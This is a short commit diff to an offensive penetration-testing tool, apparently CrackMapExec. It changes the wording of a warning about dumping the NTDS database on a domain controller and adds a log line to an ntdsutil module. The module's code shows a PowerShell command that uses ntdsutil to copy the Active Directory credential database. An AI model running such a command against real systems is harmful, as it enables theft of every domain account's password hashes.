Update message and module for ntdsutil module

main
mpgn 2023-03-23 06:42:29 -04:00 committed by Marshall Hallenbeck
parent b9f0b25938
commit 61c4738e00
2 changed files with 2 additions and 1 deletions

View File

@ -298,7 +298,7 @@ def main():
logging.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, 'ntds') and args.ntds and not args.userntds:
ans = input(highlight('[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely [Y/n] ', 'red'))
ans = input(highlight('[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the modile -M ntdsutil [Y/n] ', 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)

View File

@ -41,6 +41,7 @@ class CMEModule:
def on_admin_login(self, context, connection):
command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)
context.log.info('Dumping ntds with ntdsutil.exe to %s%s' % (self.tmp_dir,self.dump_location))
context.log.highlight('Dumping the NTDS, this could take a while so go grab a redbull...')
context.log.debug('Executing command {}'.format(command))
p = connection.execute(command, True)
context.log.debug(p)